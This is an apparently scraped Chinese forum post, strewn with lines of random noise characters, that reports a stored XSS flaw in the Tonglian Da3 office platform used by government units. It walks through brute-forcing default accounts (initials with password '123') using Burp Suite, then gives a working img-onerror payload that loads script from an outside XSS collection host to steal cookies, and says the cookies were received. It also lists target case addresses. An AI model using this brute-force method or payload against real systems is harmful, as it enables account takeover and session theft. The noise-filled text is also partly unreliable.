' ~; j8 F+ e. W: l/ O5 H
5 a& H' f! [+ X" E3 e9 Z
同联Da3协同办公平台后台通用储存型xss漏洞) d4 q9 G1 l& ?! F) _) Q
' h9 ?1 v) J- {6 |" g U* N! J2 ]! `# F! L5 Q) v; o v
平台简介:
$ x! L5 s% o# `% Q
1 b3 _% K2 d( T/ H5 g
" A& K6 o9 ], \# @7 e 5 v {! S) x* b, _
' W6 e/ s. i" r5 M0 L/ g 8 C/ M; A* p2 |: O+ I4 {
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
% B: {$ @& L9 W# e0 `$ X! A, G
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
: E: V. _! w2 a' H) X* T同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
; e" _% x" a4 j& _' N' |" U# b
$ Q# h: j$ q3 B% s, A; @# ^5 Q
8 W2 O" _$ U/ ]
& I8 M5 G( E! \1 R
" f7 K# w7 d) f8 Y) v8 a3 j/ _
9 |) m$ D( l# Y$ ~7 U 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
/ V6 K9 m8 X( d$ k4 m% @5 x1 d, Z) }
! U3 {' e1 z0 K& q% n s
5 x! }. q- g3 }" `
5 N8 L+ b" T `8 ]8 o3 E% d5 }% P
1 S8 m d+ P+ R r8 ?, \
6 C2 D+ I g! Z) e9 m9 r' j5 f! D6 Q
http://1.1.1.1:7197/cap-aco/#(案例2-)
! o) g2 I) a& l2 p) j6 }
c4 y0 k, n, M y0 U4 i . N0 { S: ?/ ?3 ]
http://www.XXOO.com (案例1-官网网站)
4 | l% e8 p' L; s
( S/ k) ` R$ Q6 W% I
$ d N/ C3 S0 h# T- C! H 漏洞详情:! A7 X0 b8 |% E! @# A
& G- p8 R1 d! {$ s
! ^" i- U( r$ D5 ~' S 案例一、
6 L& B. {1 V+ w* C: _6 x+ Q
/ D, p5 Y3 m+ y* ~ : G6 h J. N: F+ z
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
5 E1 J2 g V1 H: ~1 t* k
% o) J2 y9 C9 ^+ A. N8 m ! I" [3 C# F% Z% K0 C/ Y" d9 }) |
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
, B0 v* q: j8 A# n, b
- u' B4 m& }" s' O% V
- y% l0 g3 I+ {9 ?) |% F |
1 j5 o( S) I7 P) H8 j3 V
' k9 c3 h0 K2 j- ?) |& _ * `4 R+ [( H" O
3 q- P3 k2 B4 Q1 S& x
$ v1 E7 H/ I; o3 e9 a% ~
. [; P' [2 x7 {+ ]7 ^% h# `6 T3 b status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
5 I" A- t- L$ T; c
7 T0 c7 s2 Z, U$ {
: l' [* Z- Y. H$ l8 b/ S
3 i9 g" U; E* w/ Y, w* Y) m* H
% M& z( ?1 q3 j M. _8 P' Z
; L* B) x1 l) f2 `( P: H0 y- r
Q V. R( U/ O3 Q
' ~0 l. Z+ b; }; `1 ^- w- ~ 6 d/ j; k# v7 f p1 A0 |
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 + y( j! Q: X. u6 R+ `+ ~4 V' I
0 z' `" C) x o! [$ e, @ h% N 1 K) u# Y4 `2 v" C# O
3 @3 w8 Y) c- r; [ b
7 A8 l" A7 ~6 p, Y7 k % c* @: i0 D! G+ R- `! l' f
<img src=x- f3 W G9 }. O5 O0 l: F
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:
0 |0 N8 `9 r% o; r
/ B/ {: D+ s" p: d0 ^ ?% e0 V+ y& C2 J" i
4 ]* H0 E5 D, l, D4 C
1 Q' H6 [8 N) Z1 g5 T) F
' r6 m/ V2 u, B, G* }9 R
然后发送,接收cookie如图:
6 p& B8 p$ u' M) ?# B
% [3 x0 k3 f4 q9 o# V, z
3 Q, p1 @4 h$ X% l0 s
! A/ A/ K2 U- V7 L8 h' A
* x0 B) W* ~5 ^! O5 C; o
3 v# l1 a$ \/ h( o* U
. O ?& h5 c8 I2 w/ z) u
1 U7 q2 I2 J* u( i& ^% H
2 |6 e' W2 D9 p. u3 m! J # M5 @7 G; W: i+ ?
: j* R6 n3 i. D+ \' O* F6 h 4 _7 ~- _6 T5 C6 ]3 K
0 g) l# |) g) S: K, a1 j) V
) u( D/ C; z- R; ]
9 g0 x& \: X* _4 x$ K" W1 b5 O
: _ R) c# n4 p4 |1 ]* b
& U/ R# v$ i6 L0 O! Q/ p1 s u( V& h
4 d m0 k- V" I2 b6 p
0 u( J4 x' M6 } n: C9 ~" L
* ]/ P8 i( @3 K, B, F* b4 w0 i
, e& u. L z9 E6 t8 a' x. f8 U8 O
# p; B' s% L7 Q l6 |- h' W& T" v
) \. e7 u. N, }* }* ?
e: {6 ^5 P1 }( q9 M3 U' q 案例2、
( W% h* v, l" o7 \/ z& J
R9 F" [/ Y0 s, i- }: @0 \
& x d. B9 z: a' C+ w/ T1 L6 D6 ], }
前面步骤都一样,下面看效果图: * O3 k& b. c" v& F
; p. D2 A' I% ~
% R2 R) V/ P: R7 V" W1 p- E/ V7 E. |. D
' h3 }9 o+ s& L: T7 H
5 [9 i$ S9 @0 B! g u ) U* S# A/ q# k% G l$ U
* K* g3 ]7 I7 G8 o
% Y% U+ u' w7 F J/ q- M & c: Q% U! _) d Z7 N% I5 a
: X7 w) u: v1 a7 H9 `. f* o
1 `# i a; F0 q8 y6 n: _9 H / @" }7 N& \' G) p
- A' x( X/ q: D: M& ]
J0 Z" ]( Y* y" D2 ~ m$ X5 E
! |0 p( W Y0 o
+ e+ B+ z3 d0 _6 `8 _
4 O8 u! l8 `% b/ |( t- ]8 w + E {$ w( ?' F
- S) y* W0 F9 {6 V, I2 P( S( B
6 N0 i/ O: z3 r$ s$ w4 }" w
& G% z% o) j9 d$ e D* e2 c ; u/ U' |9 E3 {$ B$ d! x/ D7 s' B
9 ^" V4 ^! q% y: l2 [. r
% j: w# E5 l5 ]) p3 f; L
/ f" s: n1 w; y% [7 i. L8 U
5 O/ g' l& S3 L" q3 r' E4 b
8 C M: f' v2 A* g9 e 0 `0 E0 V0 \- t3 \% u+ o
* G8 G) A6 e6 y